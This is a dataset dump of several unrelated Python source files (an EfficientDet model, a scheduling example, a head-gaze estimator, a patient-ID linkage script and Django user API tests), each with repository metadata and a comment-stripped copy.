self.p4_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p3_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p4_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p5_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p6_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p7_downsample = MaxPool2dStaticSamePadding(3, 2)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
self.first_time = first_time
if self.first_time:
self.p5_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p4_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p3_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[0], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p5_to_p6 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
MaxPool2dStaticSamePadding(3, 2)
)
self.p6_to_p7 = nn.Sequential(
MaxPool2dStaticSamePadding(3, 2)
)
self.p4_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p5_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p6_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p6_w1_relu = nn.ReLU()
self.p5_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p5_w1_relu = nn.ReLU()
self.p4_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p4_w1_relu = nn.ReLU()
self.p3_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p3_w1_relu = nn.ReLU()
self.p4_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p4_w2_relu = nn.ReLU()
self.p5_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p5_w2_relu = nn.ReLU()
self.p6_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p6_w2_relu = nn.ReLU()
self.p7_w2 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p7_w2_relu = nn.ReLU()
self.attention = attention
def forward(self, inputs):
if self.attention:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward_fast_attention(inputs)
else:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward(inputs)
return p3_out, p4_out, p5_out, p6_out, p7_out
def _forward_fast_attention(self, inputs):
if self.first_time:
p3, p4, p5 = inputs
p3_in = self.p3_down_channel(p3)
p4_in_1 = self.p4_down_channel(p4)
p4_in_2 = self.p4_down_channel_2(p4)
p5_in_1 = self.p5_down_channel(p5)
p5_in_2 = self.p5_down_channel_2(p5)
p6_in = self.p5_to_p6(p5)
p7_in = self.p6_to_p7(p6_in)
p6_w1 = self.p6_w1_relu(self.p6_w1)
weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
p5_w1 = self.p5_w1_relu(self.p5_w1)
weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
p5_td= self.conv5_up(self.swish(weight[0] * p5_in_1 + weight[1] * self.p5_upsample(p6_td)))
p4_w1 = self.p4_w1_relu(self.p4_w1)
weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
p4_td= self.conv4_up(self.swish(weight[0] * p4_in_1 + weight[1] * self.p4_upsample(p5_td)))
p3_w1 = self.p3_w1_relu(self.p3_w1)
weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
p4_w2 = self.p4_w2_relu(self.p4_w2)
weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
p4_out = self.conv4_down(
self.swish(weight[0] * p4_in_2 + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
p5_w2 = self.p5_w2_relu(self.p5_w2)
weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
p5_out = self.conv5_down(
self.swish(weight[0] * p5_in_2 + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
p6_w2 = self.p6_w2_relu(self.p6_w2)
weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
p6_out = self.conv6_down(
self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
p7_w2 = self.p7_w2_relu(self.p7_w2)
weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
else:
p3_in, p4_in, p5_in, p6_in, p7_in = inputs
p6_w1 = self.p6_w1_relu(self.p6_w1)
weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
p5_w1 = self.p5_w1_relu(self.p5_w1)
weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
p5_td= self.conv5_up(self.swish(weight[0] * p5_in + weight[1] * self.p5_upsample(p6_td)))
p4_w1 = self.p4_w1_relu(self.p4_w1)
weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
p4_td= self.conv4_up(self.swish(weight[0] * p4_in + weight[1] * self.p4_upsample(p5_td)))
p3_w1 = self.p3_w1_relu(self.p3_w1)
weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
p4_w2 = self.p4_w2_relu(self.p4_w2)
weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
p4_out = self.conv4_down(
self.swish(weight[0] * p4_in + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
p5_w2 = self.p5_w2_relu(self.p5_w2)
weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
p5_out = self.conv5_down(
self.swish(weight[0] * p5_in + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
p6_w2 = self.p6_w2_relu(self.p6_w2)
weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
p6_out = self.conv6_down(
self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
p7_w2 = self.p7_w2_relu(self.p7_w2)
weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
return p3_out, p4_out, p5_out, p6_out, p7_out
def _forward(self, inputs):
if self.first_time:
p3, p4, p5 = inputs
p3_in = self.p3_down_channel(p3)
p4_in_1 = self.p4_down_channel(p4)
p4_in_2 = self.p4_down_channel_2(p4)
p5_in_1 = self.p5_down_channel(p5)
p5_in_2 = self.p5_down_channel_2(p5)
p6_in = self.p5_to_p6(p5)
p7_in = self.p6_to_p7(p6_in)
p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
p5_td= self.conv5_up(self.swish(p5_in_1 + self.p5_upsample(p6_td)))
p4_td= self.conv4_up(self.swish(p4_in_1 + self.p4_upsample(p5_td)))
p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
p4_out = self.conv4_down(
self.swish(p4_in_2 + p4_td+ self.p4_downsample(p3_out)))
p5_out = self.conv5_down(
self.swish(p5_in_2 + p5_td+ self.p5_downsample(p4_out)))
p6_out = self.conv6_down(
self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
else:
p3_in, p4_in, p5_in, p6_in, p7_in = inputs
p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
p5_td= self.conv5_up(self.swish(p5_in + self.p5_upsample(p6_td)))
p4_td= self.conv4_up(self.swish(p4_in + self.p4_upsample(p5_td)))
p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
p4_out = self.conv4_down(
self.swish(p4_in + p4_td+ self.p4_downsample(p3_out)))
p5_out = self.conv5_down(
self.swish(p5_in + p5_td+ self.p5_downsample(p4_out)))
p6_out = self.conv6_down(
self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
return p3_out, p4_out, p5_out, p6_out, p7_out
class BoxNet(nn.Module):
def __init__(self, in_channels, num_anchors, num_layers, onnx_export=False):
super(BoxNet, self).__init__()
self.num_layers = num_layers
self.conv_list = nn.ModuleList(
[SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
self.bn_list = nn.ModuleList(
[nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
self.header = SeparableConvBlock(in_channels, num_anchors * 4, norm=False, activation=False)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, inputs):
feats = []
for feat, bn_list in zip(inputs, self.bn_list):
for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
feat = conv(feat)
feat = bn(feat)
feat = self.swish(feat)
feat = self.header(feat)
feat = feat.permute(0, 2, 3, 1)
feat = feat.contiguous().view(feat.shape[0], -1, 4)
feats.append(feat)
feats = torch.cat(feats, dim=1)
return feats
class ClassNet(nn.Module):
def __init__(self, in_channels, num_anchors, num_classes, num_layers, onnx_export=False):
super(ClassNet, self).__init__()
self.num_anchors = num_anchors
self.num_classes = num_classes
self.num_layers = num_layers
self.conv_list = nn.ModuleList(
[SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
self.bn_list = nn.ModuleList(
[nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
self.header = SeparableConvBlock(in_channels, num_anchors * num_classes, norm=False, activation=False)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, inputs):
feats = []
for feat, bn_list in zip(inputs, self.bn_list):
for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
feat = conv(feat)
feat = bn(feat)
feat = self.swish(feat)
feat = self.header(feat)
feat = feat.permute(0, 2, 3, 1)
feat = feat.contiguous().view(feat.shape[0], feat.shape[1], feat.shape[2], self.num_anchors, self.num_classes)
feat = feat.contiguous().view(feat.shape[0], -1, self.num_classes)
feats.append(feat)
feats = torch.cat(feats, dim=1)
feats = feats.sigmoid()
return feats
class EfficientNet(nn.Module):
def __init__(self, phi, load_weights=False):
super(EfficientNet, self).__init__()
model = EffNet.from_pretrained(f'efficientnet-b{phi}', load_weights)
del model._conv_head
del model._bn1
del model._avg_pooling
del model._dropout
del model._fc
self.model = model
def forward(self, x):
x = self.model._conv_stem(x)
x = self.model._bn0(x)
x = self.model._swish(x)
feature_maps = []
last_x = None
for idx, block in enumerate(self.model._blocks):
drop_connect_rate = self.model._global_params.drop_connect_rate
if drop_connect_rate:
drop_connect_rate *= float(idx) / len(self.model._blocks)
x = block(x, drop_connect_rate=drop_connect_rate)
if block._depthwise_conv.stride == [2, 2]:
feature_maps.append(last_x)
elif idx == len(self.model._blocks) - 1:
feature_maps.append(x)
last_x = x
del last_x
return feature_maps[1:]
class EfficientDetBackbone(nn.Module):
def __init__(self, num_classes=80, phi=0, load_weights=False):
super(EfficientDetBackbone, self).__init__()
self.phi = phi
self.backbone_phi = [0, 1, 2, 3, 4, 5, 6, 6]
self.fpn_num_filters = [64, 88, 112, 160, 224, 288, 384, 384]
self.fpn_cell_repeats = [3, 4, 5, 6, 7, 7, 8, 8]
self.box_class_repeats = [3, 3, 3, 4, 4, 4, 5, 5]
self.anchor_scale = [4., 4., 4., 4., 4., 4., 4., 5.]
num_anchors = 9
conv_channel_coef = {
0: [40, 112, 320],
1: [40, 112, 320],
2: [48, 120, 352],
3: [48, 136, 384],
4: [56, 160, 448],
5: [64, 176, 512],
6: [72, 200, 576],
7: [72, 200, 576],
}
self.bifpn = nn.Sequential(
*[BiFPN(self.fpn_num_filters[self.phi],
conv_channel_coef[phi],
True if _ == 0 else False,
attention=True if phi < 6 else False)
for _ in range(self.fpn_cell_repeats[phi])])
self.num_classes = num_classes
self.regressor = BoxNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
num_layers=self.box_class_repeats[self.phi])
self.classifier = ClassNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
num_classes=num_classes, num_layers=self.box_class_repeats[self.phi])
self.anchors = Anchors(anchor_scale=self.anchor_scale[phi])
self.backbone_net = EfficientNet(self.backbone_phi[phi], load_weights)
def freeze_bn(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
def forward(self, inputs):
_, p3, p4, p5 = self.backbone_net(inputs)
features = (p3, p4, p5)
features = self.bifpn(features)
regression = self.regressor(features)
classification = self.classifier(features)
anchors = self.anchors(inputs)
return features, regression, classification, anchors
| true | true |
f7fa213c05b4fe9d1bb10feae5e7f577d91079db | 130 | py | Python | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | from domain.errors.image_failure import ImageFailure
class UnableToGetAllGlaucomatousImagesPathsFailure(ImageFailure):
pass
| 21.666667 | 65 | 0.861538 | from domain.errors.image_failure import ImageFailure
class UnableToGetAllGlaucomatousImagesPathsFailure(ImageFailure):
pass
| true | true |
f7fa21931bd82cc83a46973bb7ccd1c89a249317 | 795 | py | Python | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | from pyschedule import Scenario, solvers
# the planning horizon has 10 periods
S = Scenario('household',horizon=10)
# two resources: Alice and Bob
Alice, Bob = S.Resource('Alice'), S.Resource('Bob')
# three tasks: cook, wash, and clean
cook = S.Task('cook',length=1,delay_cost=1)
wash = S.Task('wash',length=2,delay_cost=1)
clean = S.Task('clean',length=3,delay_cost=2)
# every task can be done either by Alice or Bob
cook += Alice | Bob
wash += Alice | Bob
clean += Alice | Bob
#print("\n##############################")
#print("Compute and print a schedule using CBC")
#solvers.mip.solve(S,kind='CBC', msg=True)
#print(S.solution())
print("\n##############################")
print("Compute and print a schedule using GLPK")
solvers.mip.solve(S,kind='GLPK', msg=True)
print(S.solution())
| 28.392857 | 51 | 0.65283 | from pyschedule import Scenario, solvers
S = Scenario('household',horizon=10)
Alice, Bob = S.Resource('Alice'), S.Resource('Bob')
cook = S.Task('cook',length=1,delay_cost=1)
wash = S.Task('wash',length=2,delay_cost=1)
clean = S.Task('clean',length=3,delay_cost=2)
cook += Alice | Bob
wash += Alice | Bob
clean += Alice | Bob
print("\n##############################")
print("Compute and print a schedule using GLPK")
solvers.mip.solve(S,kind='GLPK', msg=True)
print(S.solution())
| true | true |
f7fa229686aa6986aa8b8f8a1dc2ccded74af095 | 5,940 | py | Python | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | 1 | 2020-07-21T10:52:26.000Z | 2020-07-21T10:52:26.000Z | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | null | null | null | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | 2 | 2020-07-21T15:30:42.000Z | 2021-01-20T21:54:09.000Z | from adam_visual_perception import LandmarkDetector
from adam_visual_perception.utility import *
import numpy as np
import math
import cv2
import os
import sys
class HeadGazeEstimator:
""" A class for estimating gaze ray from facial landmarks """
def __init__(self, write_video=False):
# 3D model points.
self.model_points = np.array(
[
(0.0, 0.0, 0.0), # Nose tip
(0.0, -330.0, -65.0), # Chin
(-225.0, 170.0, -135.0), # Left eye left corner
(225.0, 170.0, -135.0), # Right eye right corne
(-150.0, -150.0, -125.0), # Left Mouth corner
(150.0, -150.0, -125.0), # Right mouth corner
]
)
self.dist_coeffs = np.zeros((4, 1)) # Assuming no lens distortion
"""
Parameters
----------
write_video : bool, optional
Write the resulting OpenCV video
"""
self.write_video = write_video
self.landmark_detector = LandmarkDetector(write_video=False)
def get_gaze_rays(self, filename, bbox_history=None, show=True):
"""
Get the gaze rays for the given video file
"""
# Get the landmarks for the entire video
landmark_map = self.landmark_detector.detect(filename, show=False)
# Capture the video
cap = cv2.VideoCapture(filename)
frame_no = 0
gaze_angles = {}
# Loop over the frames from the video stream
while True:
success, frame = cap.read()
if not success:
if frame_no == 0:
print("Failed to read video")
sys.exit(1)
else:
break
if frame_no == 0:
# Camera internals
size = frame.shape
focal_length = size[1]
center = (size[1] / 2, size[0] / 2)
camera_matrix = np.array(
[
[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1],
],
dtype="double",
)
if self.write_video:
# Initialize our video writer
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
par_path = os.path.abspath(os.path.join(filename, os.pardir))
dir_path = par_path + "_pnp"
if not os.path.isdir(dir_path):
os.makedirs(dir_path)
video_path = os.path.join(dir_path, os.path.basename(filename))
writer = cv2.VideoWriter(
video_path, fourcc, 30, (frame.shape[1], frame.shape[0]), True
)
if frame_no in landmark_map:
# 2D image points.
image_points = np.array(
[
landmark_map[frame_no][33], # Nose tip
landmark_map[frame_no][8], # Chin
landmark_map[frame_no][36], # Left eye left corner
landmark_map[frame_no][45], # Right eye right corne
landmark_map[frame_no][48], # Left Mouth corner
landmark_map[frame_no][54], # Right mouth corner
],
dtype="double",
)
# We use this to draw a line sticking out of the nose
success, rotation_vector, translation_vector = cv2.solvePnP(
self.model_points,
image_points,
camera_matrix,
self.dist_coeffs,
flags=cv2.SOLVEPNP_ITERATIVE,
)
nose_end_point2D, jacobian = cv2.projectPoints(
np.array([(0.0, 0.0, 1000.0)]),
rotation_vector,
translation_vector,
camera_matrix,
self.dist_coeffs,
)
for p in image_points:
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (255, 0, 0), -1)
for p in landmark_map[frame_no]:
if p in image_points:
continue
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (0, 0, 255), -1)
p1 = (int(image_points[0][0]), int(image_points[0][1]))
p2 = (int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
lenAB = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
length = lenAB * 3
C_x = int(p2[0] + (p2[0] - p1[0]) / lenAB * length)
C_y = int(p2[1] + (p2[1] - p1[1]) / lenAB * length)
cv2.line(frame, p1, (C_x, C_y), (0, 255, 0), 2)
if bbox_history is not None and (self.write_video or show):
bboxes = bbox_history[frame_no]
for i, bbox in enumerate(bboxes):
x, y = int(bbox[0]), int(bbox[1])
w, h = int(bbox[2]), int(bbox[3])
cv2.circle(
frame, (int(x + w / 2), int(y + h / 2)), 5, (0, 0, 255), -1
)
# Store in the return dictionary
gaze_angles[frame_no] = (p1, p2)
# Show the frame if the flag is on
if show:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# Write the video if the flag is on
if self.write_video:
writer.write(frame)
frame_no += 1
# Cleanup
cv2.destroyAllWindows()
if self.write_video:
writer.release()
return gaze_angles
| 35.783133 | 87 | 0.458754 | from adam_visual_perception import LandmarkDetector
from adam_visual_perception.utility import *
import numpy as np
import math
import cv2
import os
import sys
class HeadGazeEstimator:
def __init__(self, write_video=False):
self.model_points = np.array(
[
(0.0, 0.0, 0.0),
(0.0, -330.0, -65.0),
(-225.0, 170.0, -135.0),
(225.0, 170.0, -135.0),
(-150.0, -150.0, -125.0),
(150.0, -150.0, -125.0),
]
)
self.dist_coeffs = np.zeros((4, 1))
self.write_video = write_video
self.landmark_detector = LandmarkDetector(write_video=False)
def get_gaze_rays(self, filename, bbox_history=None, show=True):
landmark_map = self.landmark_detector.detect(filename, show=False)
cap = cv2.VideoCapture(filename)
frame_no = 0
gaze_angles = {}
while True:
success, frame = cap.read()
if not success:
if frame_no == 0:
print("Failed to read video")
sys.exit(1)
else:
break
if frame_no == 0:
size = frame.shape
focal_length = size[1]
center = (size[1] / 2, size[0] / 2)
camera_matrix = np.array(
[
[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1],
],
dtype="double",
)
if self.write_video:
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
par_path = os.path.abspath(os.path.join(filename, os.pardir))
dir_path = par_path + "_pnp"
if not os.path.isdir(dir_path):
os.makedirs(dir_path)
video_path = os.path.join(dir_path, os.path.basename(filename))
writer = cv2.VideoWriter(
video_path, fourcc, 30, (frame.shape[1], frame.shape[0]), True
)
if frame_no in landmark_map:
image_points = np.array(
[
landmark_map[frame_no][33],
landmark_map[frame_no][8],
landmark_map[frame_no][36],
landmark_map[frame_no][45],
landmark_map[frame_no][48],
landmark_map[frame_no][54],
],
dtype="double",
)
success, rotation_vector, translation_vector = cv2.solvePnP(
self.model_points,
image_points,
camera_matrix,
self.dist_coeffs,
flags=cv2.SOLVEPNP_ITERATIVE,
)
nose_end_point2D, jacobian = cv2.projectPoints(
np.array([(0.0, 0.0, 1000.0)]),
rotation_vector,
translation_vector,
camera_matrix,
self.dist_coeffs,
)
for p in image_points:
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (255, 0, 0), -1)
for p in landmark_map[frame_no]:
if p in image_points:
continue
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (0, 0, 255), -1)
p1 = (int(image_points[0][0]), int(image_points[0][1]))
p2 = (int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
lenAB = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
length = lenAB * 3
C_x = int(p2[0] + (p2[0] - p1[0]) / lenAB * length)
C_y = int(p2[1] + (p2[1] - p1[1]) / lenAB * length)
cv2.line(frame, p1, (C_x, C_y), (0, 255, 0), 2)
if bbox_history is not None and (self.write_video or show):
bboxes = bbox_history[frame_no]
for i, bbox in enumerate(bboxes):
x, y = int(bbox[0]), int(bbox[1])
w, h = int(bbox[2]), int(bbox[3])
cv2.circle(
frame, (int(x + w / 2), int(y + h / 2)), 5, (0, 0, 255), -1
)
gaze_angles[frame_no] = (p1, p2)
if show:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
if self.write_video:
writer.write(frame)
frame_no += 1
cv2.destroyAllWindows()
if self.write_video:
writer.release()
return gaze_angles
| true | true |
f7fa2299372fe17048452363068cff5c46f44949 | 1,515 | py | Python | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | null | null | null | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | 1 | 2021-10-01T15:13:15.000Z | 2021-10-01T15:13:15.000Z | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | null | null | null | import argparse
import csv
from pathlib import Path
from dcctools.config import Configuration
parser = argparse.ArgumentParser(
description="Tool for translating linkage table to patid table for scoring"
)
parser.add_argument(
"--dotools", nargs=1, required=True, help="data-owner-tools project path"
)
args = parser.parse_args()
data_owner_tools_path = Path(args.dotools[0])
c = Configuration("config.json")
systems = c.systems
header = ["LINK_ID"]
header.extend(systems)
pii_line_map = {}
for s in systems:
pii_csv_path = Path(data_owner_tools_path) / "temp-data/pii_{}.csv".format(s)
with open(pii_csv_path) as pii_csv:
pii_reader = csv.reader(pii_csv)
next(pii_reader)
pii_line_map[s] = list(pii_reader)
result_csv_path = Path(c.matching_results_folder) / "link_ids.csv"
patid_csv_path = Path(c.matching_results_folder) / "patid_link_ids.csv"
with open(result_csv_path) as csvfile:
link_id_reader = csv.DictReader(csvfile)
with open(patid_csv_path, "w", newline="", encoding="utf-8") as patid_file:
writer = csv.DictWriter(patid_file, fieldnames=header)
writer.writeheader()
for link in link_id_reader:
row = {"LINK_ID": link["LINK_ID"]}
for s in systems:
if len(link[s]) > 0:
pii_line = link[s]
patid = pii_line_map[s][int(pii_line)][0]
row[s] = patid
writer.writerow(row)
print("results/patid_link_ids.csv created")
| 30.918367 | 81 | 0.673267 | import argparse
import csv
from pathlib import Path
from dcctools.config import Configuration
parser = argparse.ArgumentParser(
description="Tool for translating linkage table to patid table for scoring"
)
parser.add_argument(
"--dotools", nargs=1, required=True, help="data-owner-tools project path"
)
args = parser.parse_args()
data_owner_tools_path = Path(args.dotools[0])
c = Configuration("config.json")
systems = c.systems
header = ["LINK_ID"]
header.extend(systems)
pii_line_map = {}
for s in systems:
pii_csv_path = Path(data_owner_tools_path) / "temp-data/pii_{}.csv".format(s)
with open(pii_csv_path) as pii_csv:
pii_reader = csv.reader(pii_csv)
next(pii_reader)
pii_line_map[s] = list(pii_reader)
result_csv_path = Path(c.matching_results_folder) / "link_ids.csv"
patid_csv_path = Path(c.matching_results_folder) / "patid_link_ids.csv"
with open(result_csv_path) as csvfile:
link_id_reader = csv.DictReader(csvfile)
with open(patid_csv_path, "w", newline="", encoding="utf-8") as patid_file:
writer = csv.DictWriter(patid_file, fieldnames=header)
writer.writeheader()
for link in link_id_reader:
row = {"LINK_ID": link["LINK_ID"]}
for s in systems:
if len(link[s]) > 0:
pii_line = link[s]
patid = pii_line_map[s][int(pii_line)][0]
row[s] = patid
writer.writerow(row)
print("results/patid_link_ids.csv created")
| true | true |
f7fa22f365b75ce1372129858b1e1ffd535cb665 | 4,828 | py | Python | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUsersAPITest(TestCase):
"""Test the users API (public)"""
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
"""Test creating user with valid payload is successful"""
payload = {
'email': 'test@example.com',
'password': 'test123',
'name': 'Test Name'
}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
"""Test creating a user that alreadyexists fails"""
payload = {'email': 'test2@example.com', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Test that the password must be 5 characters"""
payload = {'email': 'badpass@example.com', 'password': 'pass'}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
"""Test that a token is created for the user"""
payload = {'email': 'something@domain.com', 'password': 'secret'}
create_user(**payload)
res = self.client.post(TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""Test that the token is not created if invalid credentials given"""
create_user(email='test@example.com', password='testpass')
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""Test token not created if user doesn't exist"""
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
